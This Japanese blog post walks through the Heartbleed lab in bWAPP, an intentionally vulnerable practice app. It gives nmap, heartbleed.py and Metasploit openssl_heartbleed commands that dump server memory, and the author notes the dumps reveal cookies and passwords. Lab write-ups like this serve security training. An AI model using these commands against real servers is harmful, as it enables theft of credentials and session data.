shikata ga nai

Private? There is no such things.

bWAPPでA6-Heartbleed Vulnerabilityをやってみた

Hello there, ('ω')ノ

 

Heartbleedは、OpenSSL(暗号化ライブラリ)のバグのことで。

このバグを利用して、パスワードやクッキー情報が多数流出したようで。

今回、8443ポートでログインしてとのことで。

 

f:id:ThisIsOne:20201126120912p:plain

 

まずは、スクリプトをダウンロードして。

 

f:id:ThisIsOne:20201126121319p:plain

 

いつものnmapでOpenSSL Heartbleed脆弱性のチェックをしてみると。

 nmap -p8443 --script ssl-heartbleed 10.4.128.221

 

下記のようなコメントが。

 Heartbleed Bugは、SSL / TLS暗号化によって保護されることを目的とした人気のあるOpenSSL暗号化ソフトウェアの情報に深刻な脆弱性をもたらします。

 

f:id:ThisIsOne:20201126120735p:plain

 

下記で、ログインしなおして。

 https://10.4.128.221:8443

 

f:id:ThisIsOne:20201126135113p:plain

 

ダウンロードしたスクリプトを実行してみると。

クッキーやパスワードが確認できて。

 sudo python heartbleed.py 10.4.128.221

 

f:id:ThisIsOne:20201126122006p:plain

 

とりあえず、msfconsoleを起動して。

 

f:id:ThisIsOne:20201126122801p:plain

 

heartbleedを検索して。

 

f:id:ThisIsOne:20201126123036p:plain

 

下記を使用することに。

 use auxiliary/scanner/ssl/openssl_heartbleed

 

また、オプション以外に下記を設定して詳細情報を得てみることに。

 set verbose true

 

f:id:ThisIsOne:20201126123734p:plain

 

はじめに実行したスクリプトと同じような内容で。

これでは、ログインIDが取得できず。

 

f:id:ThisIsOne:20201126123615p:plain

 

show info

 

f:id:ThisIsOne:20201126125114p:plain

 

とりあえず、ファイルにダンプすることに。

 set action DUMP

 

f:id:ThisIsOne:20201126135244p:plain

 

保存されたファイルを下記のコマンドで開いてみると。

こっちのほうがわかりやすくて。

 strings 20201125234912_default_10.4.128.221_openssl.heartble_747085.bin

 

f:id:ThisIsOne:20201126135423p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain